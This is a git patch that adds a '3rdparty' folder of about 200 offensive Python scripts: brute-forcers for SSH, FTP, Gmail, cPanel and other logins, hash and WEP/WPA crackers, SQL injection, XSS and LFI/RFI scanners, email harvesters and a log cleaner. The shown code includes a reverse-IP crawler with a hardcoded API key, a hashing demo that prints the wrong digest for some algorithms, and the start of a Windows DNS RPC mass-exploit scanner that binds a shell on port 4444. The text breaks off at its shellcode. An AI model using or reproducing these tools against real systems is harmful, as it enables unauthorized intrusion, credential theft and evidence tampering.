From 23af4af568da4d91d83a32ec6629ea7bc43d55af Mon Sep 17 00:00:00 2001 From: Brock Date: Fri, 19 Dec 2014 17:03:19 +0800 Subject: [PATCH] 3rdparty --- 3rdparty/0x150 v2.1.py | 167 + 3rdparty/Crypter.py | 66 + 3rdparty/DNSRPCscanner.py | 178 + 3rdparty/EFSscan.py | 146 + 3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py | 1041 +++++ 3rdparty/PyLogcleaner.tar.gz | Bin 0 -> 2959 bytes 3rdparty/Scan.py | 63 + 3rdparty/XSSscan.py | 326 ++ 3rdparty/XSSscan_v1.1.py | 258 ++ 3rdparty/XSSscan_v1.2.py | 299 ++ 3rdparty/accbrute.py | 56 + 3rdparty/adminscan.py | 95 + 3rdparty/alphadbgen.py | 95 + 3rdparty/alphalowcrack.py | 30 + 3rdparty/asm2shell.py | 92 + 3rdparty/b2evobf.py | 95 + 3rdparty/bannerscan.py | 128 + 3rdparty/base64tohex.py | 27 + 3rdparty/boascan.py | 80 + 3rdparty/bulletftp.py | 114 + 3rdparty/cPanelbrute.py | 125 + 3rdparty/cesarscan.py | 115 + 3rdparty/cgiscan.py | 89 + 3rdparty/cgiscan1.1.py | 102 + 3rdparty/cgiscan1.2.py | 153 + 3rdparty/cgiscan1.3.py | 180 + 3rdparty/checkersum.py | 48 + 3rdparty/checksummer.py | 66 + 3rdparty/codefinder.py | 70 + 3rdparty/column_finder.py | 119 + 3rdparty/comparedb.py | 41 + 3rdparty/cw.py | 52 + 3rdparty/d3sqlfuzz.py | 111 + 3rdparty/dataext.py | 105 + 3rdparty/dbgen.py | 39 + 3rdparty/decoder.py | 36 + 3rdparty/diggbf.py | 91 + 3rdparty/dirbuster.py | 27 + 3rdparty/dirbuster2.py | 32 + 3rdparty/dirscan.py | 52 + 3rdparty/dnsbrute.py | 61 + 3rdparty/dorkscan.py | 101 + 3rdparty/dorkster.py | 130 + 3rdparty/dumpcrack.py | 52 + 3rdparty/dumpcrack1.1.py | 82 + 3rdparty/dumpcrack1.2.py | 117 + 3rdparty/dumpemail.py | 48 + 3rdparty/emailcollect.py | 97 + 3rdparty/emailcollect_v1.2.py | 181 + 3rdparty/emailcollect_v1.3.py | 207 + 3rdparty/encoder.py | 33 + 3rdparty/findip.py | 23 + 3rdparty/findmyhash.py | 3401 +++++++++++++++++ 3rdparty/freesms.pyw | 97 + 3rdparty/friendsterbf.py | 98 + 3rdparty/ftpanon.py | 42 + 3rdparty/ftpbrute.py | 93 + 3rdparty/ftpbrute_iprange.py | 106 + 3rdparty/ftpbrute_random.py | 155 + 3rdparty/ftpbrute_random1.0.py | 105 + 3rdparty/ftprand.py | 100 + 3rdparty/gaimextract.py | 24 + 3rdparty/getresp.py | 43 + 3rdparty/gmailbrute.py | 103 + 3rdparty/gmailpopbrute.py | 104 + 3rdparty/goog-subdomains.py | 65 + 3rdparty/goog2text.py | 106 + 3rdparty/goog2text1.1.py | 72 + 3rdparty/goog2text1.2.py | 85 + 3rdparty/goog2text1.3.py | 105 + 3rdparty/goog2text1.4.py | 95 + 3rdparty/goog_mail_mod.py | 64 + 3rdparty/googemail.py | 105 + 3rdparty/googledork.py | 92 + "3rdparty/googlelinkc\314\247ek.py" | 29 + 3rdparty/hash-identifier.py | 577 +++ 3rdparty/hashbul.py | 3401 +++++++++++++++++ 3rdparty/hashgen.py | 35 + 3rdparty/hashtipi.py | 577 +++ 3rdparty/honeypot.py | 43 + 3rdparty/hostlookup.py | 44 + 3rdparty/htcrack.py | 29 + 3rdparty/icrack.py | 267 ++ 3rdparty/imapbrute.py | 77 + 3rdparty/imapbrute_iprange.py | 92 + 3rdparty/imapbrute_random.py | 91 + 3rdparty/ipbanscan.py | 89 + 3rdparty/ipgen.py | 34 + 3rdparty/ipgen1.1.py | 46 + 3rdparty/iplocate.py | 22 + 3rdparty/iprange.py | 34 + 3rdparty/iptext.py | 26 + 3rdparty/lafuzz.py | 814 ++++ 3rdparty/lfi_scanner.py | 445 +++ 3rdparty/lfifuzz.py | 86 + 3rdparty/lfiscan.py | 211 + 3rdparty/linkscan.py | 192 + 3rdparty/linkscan1.3.py | 182 + 3rdparty/linkscansimple.py | 66 + 3rdparty/linksysbrute.py | 81 + 3rdparty/locbrute.py | 46 + 3rdparty/logcheck.py | 35 + 3rdparty/logfind.py | 36 + 3rdparty/logfind1.1.zip | Bin 0 -> 2354 bytes 3rdparty/logreader.py | 43 + 3rdparty/mail2text.py | 76 + 3rdparty/md5check.py | 40 + 3rdparty/md5crack.py | 33 + 3rdparty/md5crack_gui.pyw | 61 + 3rdparty/md5db.py | 44 + 3rdparty/md5dbcrack.py | 79 + 3rdparty/md5gen.py | 13 + 3rdparty/md5randcrack.py | 61 + 3rdparty/md5word.py | 55 + 3rdparty/mdaemonscan.py | 203 + 3rdparty/milarchive.py | 36 + 3rdparty/milsearch.py | 25 + 3rdparty/milupdate.py | 42 + 3rdparty/milwebappext.py | 43 + 3rdparty/modlast.py | 54 + 3rdparty/msn2text.py | 94 + 3rdparty/multiscanner.py | 685 ++++ 3rdparty/multisearch.py | 328 ++ 3rdparty/mysql16.py | 53 + 3rdparty/mysql5crack.py | 49 + 3rdparty/mysql_default.py | 46 + 3rdparty/mysqlbrute.py | 85 + 3rdparty/mysqlbrute_iprange.py | 98 + 3rdparty/mysqlbrute_random.py | 91 + 3rdparty/niktolistscan.py | 55 + 3rdparty/nntpbrute.py | 83 + 3rdparty/nntpbrute_iprange.py | 96 + 3rdparty/nntpbrute_random.py | 95 + 3rdparty/nukescan.py | 75 + 3rdparty/openports.py | 54 + 3rdparty/orderby.py | 52 + 3rdparty/packext.py | 60 + 3rdparty/passext.py | 29 + 3rdparty/passgen.py | 70 + 3rdparty/phpBBbrute.py | 108 + 3rdparty/phpbbmembers.py | 37 + 3rdparty/phpbbscan.py | 143 + 3rdparty/phpbbver.py | 63 + 3rdparty/pincrack.py | 85 + 3rdparty/plaincrack.py | 73 + 3rdparty/popbrute.py | 84 + 3rdparty/popbrute_iprange.py | 100 + 3rdparty/popbrute_random.py | 99 + 3rdparty/proxytest.py | 62 + 3rdparty/pylogcleaner.py | 209 + 3rdparty/pywget.py | 101 + 3rdparty/pywget_simp.py | 31 + 3rdparty/qeqe.py | 40 + 3rdparty/randip.py | 23 + 3rdparty/randwebservscan.py | 42 + 3rdparty/relayfind.py | 142 + 3rdparty/revers_ip.py | 51 + 3rdparty/rfiex.py | 123 + 3rdparty/rfiscan.py | 277 ++ 3rdparty/robots.py | 22 + 3rdparty/rootbrute.py | 48 + 3rdparty/rot13.py | 23 + 3rdparty/rtgen.py | 30 + 3rdparty/sc.py | 631 +++ 3rdparty/scan_log.py | 395 ++ 3rdparty/scriptgrab.py | 37 + 3rdparty/searchdigits.py | 157 + 3rdparty/secscan.py | 776 ++++ 3rdparty/serenbf.py | 56 + 3rdparty/sha1crack.py | 37 + 3rdparty/sha1gen.py | 17 + 3rdparty/smtpbrute.py | 81 + 3rdparty/smtpbrute_iprange.py | 97 + 3rdparty/smtpbrute_random.py | 96 + 3rdparty/snmp_brute.py | 142 + 3rdparty/sqlb3m.py | 196 + 3rdparty/sqlincra.py | 50 + 3rdparty/sqlinjectionstart.py | 205 + 3rdparty/sqlresp.py | 47 + 3rdparty/sqlscan.py | 156 + 3rdparty/sqltest.py | 91 + 3rdparty/sshbrute.py | 58 + 3rdparty/sshbrute_fork.py | 84 + 3rdparty/sshbrute_iprange.py | 98 + 3rdparty/sshbrute_random.py | 89 + 3rdparty/ssl.py | 136 + 3rdparty/ssltestmulti.py | 372 ++ 3rdparty/strbreak.py | 67 + 3rdparty/subcollect.py | 45 + 3rdparty/subcollect2.py | 61 + 3rdparty/subsearch.py | 87 + 3rdparty/suidchecker.py | 71 + 3rdparty/surgescan.py | 165 + 3rdparty/tabcolext.py | 112 + 3rdparty/telnetbrute.py | 82 + 3rdparty/telnetbrute_iprange.py | 96 + 3rdparty/telnetbrute_random.py | 95 + 3rdparty/twitterbot.py | 90 + 3rdparty/v3nom.py | 740 ++++ 3rdparty/vbscan.py | 152 + 3rdparty/webauthbrute.py | 108 + 3rdparty/webauthbrute_random.py | 173 + 3rdparty/webauthbrute_random_usersupport.py | 237 ++ 3rdparty/webmin.py | 38 + 3rdparty/webmin_rand.py | 66 + 3rdparty/webminbrute.py | 104 + 3rdparty/webscan.py | 69 + 3rdparty/webservscan.py | 50 + 3rdparty/wepcrack.py | 43 + 3rdparty/wepdecode.py | 14 + 3rdparty/wepgen.py | 37 + 3rdparty/win.py | 89 + 3rdparty/winrand.py | 94 + 3rdparty/wordcreator.py | 55 + 3rdparty/wordextract.py | 48 + 3rdparty/wordpressbf.py | 103 + 3rdparty/wordsplit.py | 54 + 3rdparty/wpacrack.py | 41 + 3rdparty/xoopscan.py | 76 + 3rdparty/xss-scanner.py | 62 + 3rdparty/xssb3m.py | 75 + 3rdparty/xssfinderb3mb4m.py | 70 + 3rdparty/xsstest.py | 121 + .../icons/OmniTouch 8660 My Teamwork.png | Bin 0 -> 2034 bytes Wappalyzer/drivers/bookmarklet/json/apps.json | 78 +- .../icons/OmniTouch 8660 My Teamwork.png | Bin 0 -> 2034 bytes Wappalyzer/drivers/firefox/data/apps.json | 78 +- .../icons/OmniTouch 8660 My Teamwork.png | Bin 0 -> 2034 bytes .../firefox/data/images/icons/Wordpress.png | Bin 2156 -> 2153 bytes .../icons/OmniTouch 8660 My Teamwork.png | Bin 0 -> 2034 bytes 230 files changed, 32108 insertions(+), 72 deletions(-) create mode 100644 3rdparty/0x150 v2.1.py create mode 100644 3rdparty/Crypter.py create mode 100644 3rdparty/DNSRPCscanner.py create mode 100644 3rdparty/EFSscan.py create mode 100644 3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py create mode 100644 3rdparty/PyLogcleaner.tar.gz create mode 100644 3rdparty/Scan.py create mode 100644 3rdparty/XSSscan.py create mode 100644 3rdparty/XSSscan_v1.1.py create mode 100644 3rdparty/XSSscan_v1.2.py create mode 100644 3rdparty/accbrute.py create mode 100644 3rdparty/adminscan.py create mode 100644 3rdparty/alphadbgen.py create mode 100644 3rdparty/alphalowcrack.py create mode 100644 3rdparty/asm2shell.py create mode 100644 3rdparty/b2evobf.py create mode 100644 3rdparty/bannerscan.py create mode 100644 3rdparty/base64tohex.py create mode 100644 3rdparty/boascan.py create mode 100644 3rdparty/bulletftp.py create mode 100644 3rdparty/cPanelbrute.py create mode 100644 3rdparty/cesarscan.py create mode 100644 3rdparty/cgiscan.py create mode 100644 3rdparty/cgiscan1.1.py create mode 100644 3rdparty/cgiscan1.2.py create mode 100644 3rdparty/cgiscan1.3.py create mode 100644 3rdparty/checkersum.py create mode 100644 3rdparty/checksummer.py create mode 100644 3rdparty/codefinder.py create mode 100644 3rdparty/column_finder.py create mode 100644 3rdparty/comparedb.py create mode 100644 3rdparty/cw.py create mode 100644 3rdparty/d3sqlfuzz.py create mode 100644 3rdparty/dataext.py create mode 100644 3rdparty/dbgen.py create mode 100644 3rdparty/decoder.py create mode 100644 3rdparty/diggbf.py create mode 100644 3rdparty/dirbuster.py create mode 100644 3rdparty/dirbuster2.py create mode 100644 3rdparty/dirscan.py create mode 100644 3rdparty/dnsbrute.py create mode 100644 3rdparty/dorkscan.py create mode 100644 3rdparty/dorkster.py create mode 100644 3rdparty/dumpcrack.py create mode 100644 3rdparty/dumpcrack1.1.py create mode 100644 3rdparty/dumpcrack1.2.py create mode 100644 3rdparty/dumpemail.py create mode 100644 3rdparty/emailcollect.py create mode 100644 3rdparty/emailcollect_v1.2.py create mode 100644 3rdparty/emailcollect_v1.3.py create mode 100644 3rdparty/encoder.py create mode 100644 3rdparty/findip.py create mode 100644 3rdparty/findmyhash.py create mode 100644 3rdparty/freesms.pyw create mode 100644 3rdparty/friendsterbf.py create mode 100644 3rdparty/ftpanon.py create mode 100644 3rdparty/ftpbrute.py create mode 100644 3rdparty/ftpbrute_iprange.py create mode 100644 3rdparty/ftpbrute_random.py create mode 100644 3rdparty/ftpbrute_random1.0.py create mode 100644 3rdparty/ftprand.py create mode 100644 3rdparty/gaimextract.py create mode 100644 3rdparty/getresp.py create mode 100644 3rdparty/gmailbrute.py create mode 100644 3rdparty/gmailpopbrute.py create mode 100644 3rdparty/goog-subdomains.py create mode 100644 3rdparty/goog2text.py create mode 100644 3rdparty/goog2text1.1.py create mode 100644 3rdparty/goog2text1.2.py create mode 100644 3rdparty/goog2text1.3.py create mode 100644 3rdparty/goog2text1.4.py create mode 100644 3rdparty/goog_mail_mod.py create mode 100644 3rdparty/googemail.py create mode 100644 3rdparty/googledork.py create mode 100644 "3rdparty/googlelinkc\314\247ek.py" create mode 100644 3rdparty/hash-identifier.py create mode 100644 3rdparty/hashbul.py create mode 100644 3rdparty/hashgen.py create mode 100644 3rdparty/hashtipi.py create mode 100644 3rdparty/honeypot.py create mode 100644 3rdparty/hostlookup.py create mode 100644 3rdparty/htcrack.py create mode 100644 3rdparty/icrack.py create mode 100644 3rdparty/imapbrute.py create mode 100644 3rdparty/imapbrute_iprange.py create mode 100644 3rdparty/imapbrute_random.py create mode 100644 3rdparty/ipbanscan.py create mode 100644 3rdparty/ipgen.py create mode 100644 3rdparty/ipgen1.1.py create mode 100644 3rdparty/iplocate.py create mode 100644 3rdparty/iprange.py create mode 100644 3rdparty/iptext.py create mode 100644 3rdparty/lafuzz.py create mode 100644 3rdparty/lfi_scanner.py create mode 100644 3rdparty/lfifuzz.py create mode 100644 3rdparty/lfiscan.py create mode 100644 3rdparty/linkscan.py create mode 100644 3rdparty/linkscan1.3.py create mode 100644 3rdparty/linkscansimple.py create mode 100644 3rdparty/linksysbrute.py create mode 100644 3rdparty/locbrute.py create mode 100644 3rdparty/logcheck.py create mode 100644 3rdparty/logfind.py create mode 100644 3rdparty/logfind1.1.zip create mode 100644 3rdparty/logreader.py create mode 100644 3rdparty/mail2text.py create mode 100644 3rdparty/md5check.py create mode 100644 3rdparty/md5crack.py create mode 100644 3rdparty/md5crack_gui.pyw create mode 100644 3rdparty/md5db.py create mode 100644 3rdparty/md5dbcrack.py create mode 100644 3rdparty/md5gen.py create mode 100644 3rdparty/md5randcrack.py create mode 100644 3rdparty/md5word.py create mode 100644 3rdparty/mdaemonscan.py create mode 100644 3rdparty/milarchive.py create mode 100644 3rdparty/milsearch.py create mode 100644 3rdparty/milupdate.py create mode 100644 3rdparty/milwebappext.py create mode 100644 3rdparty/modlast.py create mode 100644 3rdparty/msn2text.py create mode 100644 3rdparty/multiscanner.py create mode 100644 3rdparty/multisearch.py create mode 100644 3rdparty/mysql16.py create mode 100644 3rdparty/mysql5crack.py create mode 100644 3rdparty/mysql_default.py create mode 100644 3rdparty/mysqlbrute.py create mode 100644 3rdparty/mysqlbrute_iprange.py create mode 100644 3rdparty/mysqlbrute_random.py create mode 100644 3rdparty/niktolistscan.py create mode 100644 3rdparty/nntpbrute.py create mode 100644 3rdparty/nntpbrute_iprange.py create mode 100644 3rdparty/nntpbrute_random.py create mode 100644 3rdparty/nukescan.py create mode 100644 3rdparty/openports.py create mode 100644 3rdparty/orderby.py create mode 100644 3rdparty/packext.py create mode 100644 3rdparty/passext.py create mode 100644 3rdparty/passgen.py create mode 100644 3rdparty/phpBBbrute.py create mode 100644 3rdparty/phpbbmembers.py create mode 100644 3rdparty/phpbbscan.py create mode 100644 3rdparty/phpbbver.py create mode 100644 3rdparty/pincrack.py create mode 100644 3rdparty/plaincrack.py create mode 100644 3rdparty/popbrute.py create mode 100644 3rdparty/popbrute_iprange.py create mode 100644 3rdparty/popbrute_random.py create mode 100644 3rdparty/proxytest.py create mode 100644 3rdparty/pylogcleaner.py create mode 100644 3rdparty/pywget.py create mode 100644 3rdparty/pywget_simp.py create mode 100644 3rdparty/qeqe.py create mode 100644 3rdparty/randip.py create mode 100644 3rdparty/randwebservscan.py create mode 100644 3rdparty/relayfind.py create mode 100644 3rdparty/revers_ip.py create mode 100644 3rdparty/rfiex.py create mode 100644 3rdparty/rfiscan.py create mode 100644 3rdparty/robots.py create mode 100644 3rdparty/rootbrute.py create mode 100644 3rdparty/rot13.py create mode 100644 3rdparty/rtgen.py create mode 100644 3rdparty/sc.py create mode 100644 3rdparty/scan_log.py create mode 100644 3rdparty/scriptgrab.py create mode 100644 3rdparty/searchdigits.py create mode 100644 3rdparty/secscan.py create mode 100644 3rdparty/serenbf.py create mode 100644 3rdparty/sha1crack.py create mode 100644 3rdparty/sha1gen.py create mode 100644 3rdparty/smtpbrute.py create mode 100644 3rdparty/smtpbrute_iprange.py create mode 100644 3rdparty/smtpbrute_random.py create mode 100644 3rdparty/snmp_brute.py create mode 100644 3rdparty/sqlb3m.py create mode 100644 3rdparty/sqlincra.py create mode 100644 3rdparty/sqlinjectionstart.py create mode 100644 3rdparty/sqlresp.py create mode 100644 3rdparty/sqlscan.py create mode 100644 3rdparty/sqltest.py create mode 100644 3rdparty/sshbrute.py create mode 100644 3rdparty/sshbrute_fork.py create mode 100644 3rdparty/sshbrute_iprange.py create mode 100644 3rdparty/sshbrute_random.py create mode 100644 3rdparty/ssl.py create mode 100644 3rdparty/ssltestmulti.py create mode 100644 3rdparty/strbreak.py create mode 100644 3rdparty/subcollect.py create mode 100644 3rdparty/subcollect2.py create mode 100644 3rdparty/subsearch.py create mode 100644 3rdparty/suidchecker.py create mode 100644 3rdparty/surgescan.py create mode 100644 3rdparty/tabcolext.py create mode 100644 3rdparty/telnetbrute.py create mode 100644 3rdparty/telnetbrute_iprange.py create mode 100644 3rdparty/telnetbrute_random.py create mode 100644 3rdparty/twitterbot.py create mode 100644 3rdparty/v3nom.py create mode 100644 3rdparty/vbscan.py create mode 100644 3rdparty/webauthbrute.py create mode 100644 3rdparty/webauthbrute_random.py create mode 100644 3rdparty/webauthbrute_random_usersupport.py create mode 100644 3rdparty/webmin.py create mode 100644 3rdparty/webmin_rand.py create mode 100644 3rdparty/webminbrute.py create mode 100644 3rdparty/webscan.py create mode 100644 3rdparty/webservscan.py create mode 100644 3rdparty/wepcrack.py create mode 100644 3rdparty/wepdecode.py create mode 100644 3rdparty/wepgen.py create mode 100644 3rdparty/win.py create mode 100644 3rdparty/winrand.py create mode 100644 3rdparty/wordcreator.py create mode 100644 3rdparty/wordextract.py create mode 100644 3rdparty/wordpressbf.py create mode 100644 3rdparty/wordsplit.py create mode 100644 3rdparty/wpacrack.py create mode 100644 3rdparty/xoopscan.py create mode 100644 3rdparty/xss-scanner.py create mode 100644 3rdparty/xssb3m.py create mode 100644 3rdparty/xssfinderb3mb4m.py create mode 100644 3rdparty/xsstest.py create mode 100644 Wappalyzer/drivers/bookmarklet/images/icons/OmniTouch 8660 My Teamwork.png create mode 100644 Wappalyzer/drivers/chrome/images/icons/OmniTouch 8660 My Teamwork.png create mode 100644 Wappalyzer/drivers/firefox/data/images/icons/OmniTouch 8660 My Teamwork.png create mode 100644 Wappalyzer/drivers/html/images/icons/OmniTouch 8660 My Teamwork.png diff --git a/3rdparty/0x150 v2.1.py b/3rdparty/0x150 v2.1.py new file mode 100644 index 0000000..f3ba7f4 --- /dev/null +++ b/3rdparty/0x150 v2.1.py @@ -0,0 +1,167 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- +# 0x150 Web Crawler v2.1 + +from PyQt4 import QtCore, QtGui +import socket +import urllib +import urllib2 +import mechanize +import urlparse +from xml.dom.minidom import parse, parseString +from bs4 import BeautifulSoup +import base64 +try: + _fromUtf8 = QtCore.QString.fromUtf8 +except AttributeError: + _fromUtf8 = lambda s: s +class MyOpener(urllib.FancyURLopener): + version = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15' + +class Ui_MainWindow(object): + def setupUi(self, MainWindow): + MainWindow.setObjectName(_fromUtf8("MainWindow")) + MainWindow.resize(722, 364) + self.centralwidget = QtGui.QWidget(MainWindow) + self.centralwidget.setObjectName(_fromUtf8("centralwidget")) + self.pushButton = QtGui.QPushButton(self.centralwidget) + self.pushButton.setGeometry(QtCore.QRect(320, 10, 111, 31)) + self.pushButton.setObjectName(_fromUtf8("pushButton")) + self.listView = QtGui.QListWidget(self.centralwidget) + self.listView.setGeometry(QtCore.QRect(10, 50, 301, 251)) + self.listView.setObjectName(_fromUtf8("listView")) + self.textEdit = QtGui.QLineEdit(self.centralwidget) + self.textEdit.setGeometry(QtCore.QRect(10, 10, 301, 31)) + self.textEdit.setObjectName(_fromUtf8("textEdit")) + self.textEdit.setPlaceholderText(_fromUtf8("Reverse Çek")) + self.pushButton_2 = QtGui.QPushButton(self.centralwidget) + self.pushButton_2.setGeometry(QtCore.QRect(320, 50, 111, 31)) + self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) + #self.pushButton_4 = QtGui.QPushButton(self.centralwidget) + #self.pushButton_4.setGeometry(QtCore.QRect(320, 90, 111, 31)) + #self.pushButton_4.setObjectName(_fromUtf8("pushButton_4")) + self.listView_2 = QtGui.QListWidget(self.centralwidget) + self.listView_2.setGeometry(QtCore.QRect(440, 10, 271, 291)) + self.listView_2.setObjectName(_fromUtf8("listView_2")) + self.pushButton_5 = QtGui.QPushButton(self.centralwidget) + self.pushButton_5.setGeometry(QtCore.QRect(320, 90, 111, 31)) + self.pushButton_5.setObjectName(_fromUtf8("pushButton_5")) + self.pushButton_3 = QtGui.QPushButton(self.centralwidget) + self.pushButton_3.setGeometry(QtCore.QRect(320, 270, 111, 31)) + self.pushButton_3.setObjectName(_fromUtf8("pushButton_3")) + MainWindow.setCentralWidget(self.centralwidget) + self.menubar = QtGui.QMenuBar(MainWindow) + self.menubar.setGeometry(QtCore.QRect(0, 0, 722, 29)) + self.menubar.setObjectName(_fromUtf8("menubar")) + self.menuDosya = QtGui.QMenu(self.menubar) + self.menuDosya.setObjectName(_fromUtf8("menuDosya")) + + MainWindow.setMenuBar(self.menubar) + self.statusbar = QtGui.QStatusBar(MainWindow) + self.statusbar.setObjectName(_fromUtf8("statusbar")) + MainWindow.setStatusBar(self.statusbar) + self.actionKaydet = QtGui.QAction(MainWindow) + self.actionKaydet.setObjectName(_fromUtf8("actionKaydet")) + self.actionKaydet.setShortcut('Ctrl+S') + + self.actionKaydet.triggered.connect(self.saveFile) + self.actionExit = QtGui.QAction(MainWindow) + self.actionExit.setObjectName(_fromUtf8("actionExit")) + self.actionExit.setShortcut('Ctrl+Q') + self.actionExit.triggered.connect(QtGui.qApp.quit) + self.menuDosya.addAction(self.actionKaydet) + self.menuDosya.addAction(self.actionExit) + self.menubar.addAction(self.menuDosya.menuAction()) + + self.retranslateUi(MainWindow) + QtCore.QMetaObject.connectSlotsByName(MainWindow) + QtCore.QObject.connect(self.pushButton,QtCore.SIGNAL("clicked()"),self.reverse) + QtCore.QObject.connect(self.pushButton_2,QtCore.SIGNAL("clicked()"),self.cekkeke) + # QtCore.QObject.connect(self.pushButton_4,QtCore.SIGNAL("clicked()"),self.temizle) + QtCore.QObject.connect(self.pushButton_5,QtCore.SIGNAL("clicked()"),self.temizle2) + QtCore.QObject.connect(self.pushButton_3,QtCore.SIGNAL("clicked()"),self.saveFile) + + def temizle(self): + self.listView_2.clear() + def temizle2(self): + self.listView.clear() + def cekkeke(self): + self.listView_2.clear() + self.myopener = MyOpener() + #page = urllib.urlopen(url) + self.page = self.myopener.open("http://"+ str(self.listView.currentItem().text())) + + self.text = self.page.read() + self.page.close() + + self.soup = BeautifulSoup(self.text) + + for self.tag in self.soup.findAll('a', href=True): + self.xx = self.tag["href"] + if self.xx.startswith("http://") == False and self.xx.startswith("https://")==False: + if self.xx.startswith("/")==True: + self.listView_2.addItem(self.listView.currentItem().text()+self.xx) + else: + self.listView_2.addItem(self.listView.currentItem().text()+"/"+self.xx) + def retranslateUi(self, MainWindow): + MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "0x150 Web Crawler v2.1", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton.setText(QtGui.QApplication.translate("MainWindow", "< < Reverse IP", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_2.setText(QtGui.QApplication.translate("MainWindow", "<< Crawler >>", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_3.setText(QtGui.QApplication.translate("MainWindow", "< < Kaydet >>", None, QtGui.QApplication.UnicodeUTF8)) + self.menuDosya.setTitle(QtGui.QApplication.translate("MainWindow", "Dosya", None, QtGui.QApplication.UnicodeUTF8)) + #self.menuHakk_nda.setTitle(QtGui.QApplication.translate("MainWindow", "Hakkında", None, QtGui.QApplication.UnicodeUTF8)) + self.actionKaydet.setText(QtGui.QApplication.translate("MainWindow", "Kaydet", None, QtGui.QApplication.UnicodeUTF8)) + self.actionExit.setText(QtGui.QApplication.translate("MainWindow", "Exit", None, QtGui.QApplication.UnicodeUTF8)) + #self.pushButton_4.setText(QtGui.QApplication.translate("MainWindow", "Temizle >>", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_5.setText(QtGui.QApplication.translate("MainWindow", "< < Temizle", None, QtGui.QApplication.UnicodeUTF8)) + def saveFile(self): + self.filename = QtGui.QFileDialog.getSaveFileName(None, 'Save File',"/") + self.f = open(self.filename, 'w') + self.xe = open(self.textEdit.text()+"_reverse-ip.txt","w") + items = [] + cocumuyo = [] + for index in xrange(self.listView_2.count()): + items.append(self.listView_2.item(index)) + for i in items: + #print i.text() + self.f.write(i.text()+"\n") + for ix in xrange(self.listView.count()): + cocumuyo.append(self.listView.item(ix)) + for i in cocumuyo: + self.xe.write(i.text()+"\n") + self.xe.close() + self.f.close() + #print self.listView.currentItem().text() + def reverse(self): + self.listView.addItem(self.textEdit.text()) + self.sites = [] + self.top = 50 + self.skip = 0 + self.account_key ="6XgKqcpSQqUPnODbSdOK9sOy30ng0ilUci99d5pol8I" + self.ipal = self.textEdit.text() + self.ip = socket.gethostbyname(str(self.ipal)) + while self.skip < 200: + self.url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"%(self.ip,self.top,self.skip) + self.request = urllib2.Request(self.url) + self.auth = base64.encodestring("%s:%s" % (self.account_key, self.account_key)).replace("\n", "") + self.request.add_header("Authorization", "Basic %s" % self.auth) + self.res = urllib2.urlopen(self.request) + self.data = self.res.read() + self.xmldoc = parseString(self.data) + self.site_list = self.xmldoc.getElementsByTagName('d:Url') + for self.site in self.site_list: + self.domain = self.site.childNodes[0].nodeValue + self.domain = self.domain.split("/")[2] + if self.domain not in self.sites: + self.sites.append(self.domain) + self.skip += 50 + for self.xs in self.sites: + self.listView.addItem(self.xs) +if __name__ == "__main__": + import sys + app = QtGui.QApplication(sys.argv) + MainWindow = QtGui.QMainWindow() + ui = Ui_MainWindow() + ui.setupUi(MainWindow) + MainWindow.show() + sys.exit(app.exec_()) \ No newline at end of file diff --git a/3rdparty/Crypter.py b/3rdparty/Crypter.py new file mode 100644 index 0000000..c0615a0 --- /dev/null +++ b/3rdparty/Crypter.py @@ -0,0 +1,66 @@ +from Crypto.Hash import HMAC +from Crypto.Hash import MD2 +from Crypto.Hash import MD4 +from Crypto.Hash import MD5 +from Crypto.Hash import RIPEMD +from Crypto.Hash import SHA +from Crypto.Hash import SHA256 + + + + ######## + #B3mB4m# + ######## + + +#Hi guyss im B3mB4m to day topic how to use PyCrypto - The Python Cryptography Toolkit ? !! + +# You can see codes here, but � want change somethins + +word = raw_input("Give me the word : ") + + +""" + +from Crypto.Hash import HMAC +from Crypto.Hash import MD2 +from Crypto.Hash import MD4 +from Crypto.Hash import MD5 +from Crypto.Hash import RIPEMD +from Crypto.Hash import SHA +from Crypto.Hash import SHA256 + +HMAC-MD2-MD4-MD5-SHA-SHA526-RIPEMD .. now lets try + + +""" + + +secret = b'B3mB4m' +h = HMAC.new(secret) +h.update(word) +print "HMAC = "+h.hexdigest() + +h2 = MD2.new() +h2.update(word) +print "MD2 = "+h2.hexdigest() + +h3 = MD4.new() +h3.update(word) +print "MD4 = "+h3.hexdigest() + +h4 = MD5.new() +h4.update(word) +print "MD5 = "+h3.hexdigest() + +h5 = RIPEMD.new() +h5.update(word) +print "RIPEMD = "+h5.hexdigest() + +h6 = SHA.new() +h6.update(word) +print "SHA = "+h6.hexdigest() + +h7 = SHA.new() +h7.update(word ) +print "SHA256 = "+h7.hexdigest() diff --git a/3rdparty/DNSRPCscanner.py b/3rdparty/DNSRPCscanner.py new file mode 100644 index 0000000..4787401 --- /dev/null +++ b/3rdparty/DNSRPCscanner.py @@ -0,0 +1,178 @@ +#!/usr/bin/python +#This is a Windows DNS RPC service scanner for the new exploit #http://www.milw0rm.com/exploits/3737, uses nmap to locate win2000 machines +#and if found continues to use the exploit. Threw in a little threading to speed +#the process up. Remove the 2000 and whitespace in between at line 137 to exploit +#all windows machines found. I noticed for this exploit you need impacket for it +#to work properly, http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz +#download that, untar, cd, su root, python setup.py install +#thats it... + +#!!! You need to be root for the nmap flags to work properly !!! + +# Remote exploit for the 0day Windows DNS RPC service vulnerability as +# described in http://www.securityfocus.com/bid/23470/info. Tested on +# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 +# and then connects to it. +# +# Cheers to metasploit for the first exploit. +# Written for educational and testing purposes. +# Author shall bear no responsibility for any damage caused by using this code +# Winny Thomas :-) + +import os, StringIO, re, random, commands, sys, time, thread +try: + from impacket.dcerpc import transport, dcerpc, epm + from impacket import uuid +except(ImportError): + print "\nYou need the Impacket Module" + print "http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz\n" + sys.exit(1) + +#Portbind shellcode from metasploit; Binds port to TCP port 4444 +shellcode = 